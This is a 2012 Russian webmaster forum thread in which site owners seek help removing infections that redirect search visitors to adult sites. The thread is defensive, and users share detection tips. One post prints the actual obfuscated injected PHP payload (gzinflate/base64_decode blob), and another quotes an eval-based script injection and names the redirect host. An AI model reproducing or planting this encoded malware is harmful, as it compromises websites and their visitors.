X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Вирус на сайте.
geryon
geryon
Topic Starter сообщение 31.7.2012, 10:57; Ответить: geryon
Сообщение #1


Участник
***

Группа: User
Сообщений: 202
Регистрация: 11.7.2012
Поблагодарили: 29 раз
Репутация:   10  


Есть сайт на wp, хостится у iphoster.ru, то было время я на него не заходил, а он пролежал целый месяц по вине хостера, после чего мне сказали что сам виноват, надо следить за сайтами, круто, у них лег хост, а я виноват, ну дело не в этом.
На данный момент сайт выкинуло из поиска яндекса, я так понял по той причине, что переходя с поиска на сайт, всех перекидывает на http://mefound.sytes.net/?said=3333g&q= вот такие страницы, которые веду на адалт сайты. Может кто сталкивался? Как решить эту проблему?
Если переходить на сайт просто вводя адрес в браузерную строку, то все нормально, а если гугла или с яндекса(пока не выкинуло) то перекидывает вот сюда, самое удивительное то, что сайт вообще не трогал, ничего не загружал, и даже не заходил туда уже давно.
Помогите пожалуйста.


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
OMGet
OMGet
сообщение 31.7.2012, 11:01; Ответить: OMGet
Сообщение #2


Завсегдатай
*****

Группа: Active User
Сообщений: 561
Регистрация: 7.11.2011
Поблагодарили: 220 раз
Репутация:   27  


вирус закодирован, перенаправляет смотря откуда пришел, чтобы не сразу спалила администрация, ищите в php файлах в закодированом виде,
Раскодировать можно тут
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kioto
kioto
сообщение 31.7.2012, 11:05; Ответить: kioto
Сообщение #3


Бывалый
****

Группа: User
Сообщений: 282
Регистрация: 7.5.2009
Поблагодарили: 81 раз
Репутация:   24  


Так вон же, в футере, перед тегом <body> три строки. Это оно и есть. Вероятнее всего будет в файлах html, js. Возможно, tpl, если используется Smarty.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
geryon
geryon
Topic Starter сообщение 31.7.2012, 11:27; Ответить: geryon
Сообщение #4


Участник
***

Группа: User
Сообщений: 202
Регистрация: 11.7.2012
Поблагодарили: 29 раз
Репутация:   10  


В подвале убрал но все равно.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kioto
kioto
сообщение 31.7.2012, 11:28; Ответить: kioto
Сообщение #5


Бывалый
****

Группа: User
Сообщений: 282
Регистрация: 7.5.2009
Поблагодарили: 81 раз
Репутация:   24  


Не убрали. Сами исходный код страницы посмотрите. Еще где-то есть.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
zdev1l1990
zdev1l1990
сообщение 31.7.2012, 11:37; Ответить: zdev1l1990
Сообщение #6


Участник
***

Группа: User
Сообщений: 125
Регистрация: 19.7.2012
Поблагодарили: 16 раз
Репутация:   2  


помогите тоже определить где именно вирус?)
http://nerpc.ru хром ругается...


--------------------
Самый крутой хостинг
Зарабатываю от 10к в мес. здесь.
Покупаю/продаю сайты тут
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kioto
kioto
сообщение 31.7.2012, 11:42; Ответить: kioto
Сообщение #7


Бывалый
****

Группа: User
Сообщений: 282
Регистрация: 7.5.2009
Поблагодарили: 81 раз
Репутация:   24  


zdev1l1990,
самая первая строка, перед "<!DOCTYPE".

Начинается: <script>try{eval("pro"+"totype")>0;}...

Вообще, народ... Проверяете всегда следующее:

1. строки ПЕРЕД закрывающим тегом </body>
2. теги <script></script>
3. теги <iframe>

99% гадости цепляются именно сюда. Вычистите это - считайте, дело сделано. Наиболее часто атакуемые файлы: html/htm, js, php, tpl.

Сообщение отредактировал kioto - 31.7.2012, 11:46


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
geryon
geryon
Topic Starter сообщение 31.7.2012, 12:07; Ответить: geryon
Сообщение #8


Участник
***

Группа: User
Сообщений: 202
Регистрация: 11.7.2012
Поблагодарили: 29 раз
Репутация:   10  


Ничего у меня не выходит sad.gif
Сделаю бесплатно прогон(который в подписи) тому, кто поможет решить эту проблему.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kioto
kioto
сообщение 31.7.2012, 12:08; Ответить: kioto
Сообщение #9


Бывалый
****

Группа: User
Сообщений: 282
Регистрация: 7.5.2009
Поблагодарили: 81 раз
Репутация:   24  


Мне Вы уже делали прогон smile.gif. Но все равно давайте гляну. Доступ от фтп в личку скиньте.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
zdev1l1990
zdev1l1990
сообщение 31.7.2012, 12:12; Ответить: zdev1l1990
Сообщение #10


Участник
***

Группа: User
Сообщений: 125
Регистрация: 19.7.2012
Поблагодарили: 16 раз
Репутация:   2  


да видел... найти не мог в каком файле... думал может подскажет кто, у кого было подобное, ща нашел уже.

#c3284d#
echo(gzinflate(base64_decode("hVTNbuMgEH4XpEq2rLpgBgxy6KWP0OOqhyjrbFC7cWRbq+1GffdlhhBotNVe0Gj8wfczk2yW3ex
P6+M6v5/HX9u3ip3miTVsndb308jqRz587Lbr7lD9+b2rz6ND0HB0TIi+bQXnbWvxEEKE01iBZY9dgyXHrrUE0OE
EAVhSg3caT0U1QEJLxElEKOAJYIXBe9gwvcSuJWYboB2hpLoCUISmpzgxQGYgEUF1eE0Z1NOFxwD1AoR
b
Cj8rHpBAlQhflUy6ATmhD75Vn3oK2cHoyysXnSL7y2FEAJDOnBuPWBKTxSXRWGuZDVLbWptDjLZEcVN9
y
iB6oOy1QampR24oIUqQhmRvJqcAA0bOXunEebGgb+YW/RK4M5SCyhuRZZNT23fXyUYb8hNbnDFFVzos1H69D9bkiOA2ZpRYrEacg7Wl7phBIbDrE7IQaP+13cQfW
QupUl+hlBx5jV26lV8F5CsTzHFzXsQNX9xSCteFp73+709Hoz6pcDdp2hJNkTrO2uX05teKtS2rh4Prh
s
UxNuynufKOD/fCqMZv+OCdaHx9fnU+AJbmeZ398Ue7n6efT4ft/DR9H6vjt9eXh8rfVYe6sXU9fPh9xUXnnBO8HqsldDYPl7+hvw==")));
#/c3284d#

вот такого рода код нашел... закодирован просто был, что и осложнило поиск.


--------------------
Самый крутой хостинг
Зарабатываю от 10к в мес. здесь.
Покупаю/продаю сайты тут
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) SimplePay: Прием платежей на сайте для юридических и физических лиц
2 kuprum 345 Вчера, 15:50
автор: kuprum
Горячая тема (нет новых ответов) Рекомендую: размещение статьи на сайте, ТИЦ 325, PR 6, траст XT 8
44 rumblade 10652 Вчера, 15:45
автор: rumblade
Открытая тема (нет новых ответов) 17 вещей на вашем сайте, которые ненавидят
Один из постулатов маркетинга — не раздражать людей
25 PostBrigada 3610 12.12.2017, 21:44
автор: alexandrrr
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПрибыль с видео на сайте и в соц сетях
Как получить доп доход с нативного контента
14 maxim_krasovskiy 2825 12.12.2017, 12:05
автор: maxim_krasovskiy
Открытая тема (нет новых ответов) ALFAcoins.com - Приём криптовалюты на вашем сайте
17 ALFAcoins 3691 11.12.2017, 23:07
автор: ALFAcoins


 



RSS Текстовая версия Сейчас: 15.12.2017, 10:37
Дизайн